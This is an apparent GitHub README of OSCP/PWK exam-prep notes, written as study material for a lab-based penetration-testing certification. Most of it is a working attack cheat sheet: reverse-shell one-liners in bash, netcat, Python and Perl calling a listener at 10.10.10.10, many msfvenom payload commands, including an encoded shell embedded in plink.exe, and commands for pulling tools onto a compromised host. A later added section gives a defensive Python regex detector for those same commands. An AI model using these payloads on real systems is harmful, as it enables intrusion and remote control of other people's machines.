/OSCP-PWK-Repo

The stuff I gathered during my time at the PWK labs and my OSCP exam.

OSCP / PWK Repo

During my time at the PWK labs and for my OSCP preparation, I gathered a big amount of useful stuff that I want to share and make available to the community. With a huge amount of respect to the Offensive Security team, I will not disclose anything about the labs and the exam, but I will give general information and study lines for the young padawans out there who want to TRY HARDER!!!

Note: There is a high probability that you will get nothing new from this repo. These are just my notes and sources, and you can find everything online, but they are gathered in a way that suited me at the time of my exam. :)

Some Useful Tips:

  • TRY HARDER (Yes, you will hear it a lot but this is the only way)
  • Methodology, methodology, methodology
  • Use the forums if you are stuck
  • Do not use Metasploit (I mean you can use it, but why ;) )
  • Learn your PrivEsc
  • Manage your time
  • Make a lab report (It saved me :P)
  • Most of the time there is more than one way to achieve something ;)
  • If you find yourself executing the same commands for more than 10 minutes, maybe you have to look elsewhere
  • Take breaks

General Links

Enumeration

Web

Shell Exploitation

Reverse Shells

  • bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
  • nc -e /bin/sh 10.10.10.10 4443
  • nc -e cmd.exe 10.10.10.10 4443
  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Spawn TTY Shells

  • python -c 'import pty; pty.spawn("/bin/sh")'
  • echo os.system('/bin/bash')
  • /bin/sh -i
  • perl -e 'exec "/bin/sh";'
  • perl: exec "/bin/sh";
  • ruby: exec "/bin/sh"
  • lua: os.execute('/bin/sh')
  • (From within IRB): exec "/bin/sh"
  • (From within vi): :!bash
  • (From within vi): :set shell=/bin/bash followed by :shell
  • (From within nmap): !sh

msfvenom payloads

  • PHP reverse shell: msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
  • Java WAR reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
  • Linux bind shell: msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
  • FreeBSD reverse shell: msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
  • Linux C reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
  • Windows non staged reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
  • Windows Staged (Meterpreter) reverse shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
  • Windows Python reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
  • Windows ASP reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
  • Windows ASPX reverse shell: msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
  • Windows JavaScript reverse shell with nops: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
  • Windows Powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
  • Windows reverse shell excluding bad characters: msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
  • Windows x64 bit reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
  • Windows reverse shell embedded into plink: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

File Transfers

HTTP

# In Kali (Python 2 module; on Python 3 the equivalent module is http.server)
python -m SimpleHTTPServer 80

# In reverse shell - Linux
wget 10.10.10.10/file

# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"

FTP

# In Kali
python -m pyftpdlib -p 21 -w

# In reverse shell
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt 
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt

“Name the filename as ‘file’ on your Kali machine so that you don’t have to re-write the script multiple times; you can then rename the file on Windows.”

TFTP

# In Kali
atftpd --daemon --port 69 /tftp

# In reverse shell
tftp -i 10.10.10.10 GET nc.exe

VBS

If FTP/TFTP fails you, this wget script in VBS is the go-to on Windows machines.

# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe
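
From the defender's side, the reverse-shell one-liners and the Windows transfer commands listed above all leave recognisable process command lines. The following is an added example, not part of the original repo: the rule names, the event layout and the sample events are assumptions constructed for illustration, and each rule keys on the structure of the command rather than on the address or port.

```python
import re

# Added example (not from the original repo). Rule names are hypothetical;
# each pattern targets one command shape listed in this README.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    "fifo_netcat": re.compile(
        r"\bmkfifo\b.*\|\s*(/bin/)?(ba)?sh\b.*\|\s*(nc|ncat|netcat)\b"),
    "netcat_exec": re.compile(
        r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\s+\S*(sh|cmd\.exe)\b", re.I),
    "script_socket_shell": re.compile(
        r"\b(python\d?|perl)\b.*\bsocket\b.*(/bin/(ba)?sh|cmd\.exe)", re.I),
    "ps_webclient_download": re.compile(
        r"powershell.*net\.webclient.*downloadfile", re.I),
    "ftp_script_file": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
    "tftp_get": re.compile(r"\btftp(\.exe)?\b\s+-i\s+\S+\s+get\b", re.I),
    "cscript_downloader": re.compile(
        r"\bcscript(\.exe)?\b.*\.vbs\s+https?://", re.I),
}

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

# Constructed process-creation events: (host, command line).
SAMPLE_EVENTS = [
    ("web01", "bash -i >& /dev/tcp/10.10.10.10/4443 0>&1"),
    ("web01", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1"
              "|nc 10.10.10.10 4443 >/tmp/f"),
    ("win07", "nc -e cmd.exe 10.10.10.10 4443"),
    ("win07", "ftp -v -n -s:ftp.txt"),
    ("win07", "cscript wget.vbs http://10.10.10.10/file.exe file.exe"),
    ("web01", "python3 -m http.server 8000"),  # benign: no socket-to-shell
    ("web01", "ftp ftp.example.org"),          # benign: no -s: script file
]

def triage(events):
    """Return (host, cmdline, rules) for events that hit at least one rule."""
    alerts = []
    for host, cmd in events:
        hits = classify(cmd)
        if hits:
            alerts.append((host, cmd, hits))
    return alerts

if __name__ == "__main__":
    for host, cmd, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {','.join(hits)} <- {cmd}")
```

Command-line matching only sees what the process-creation log records, so it is a first-pass filter to pair with network telemetry, not a complete control.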

Privilege Escalation

Common privilege escalation exploits and scripts: https://github.com/AusJock/Privilege-Escalation

Linux

Windows

Offensive Security Links

Books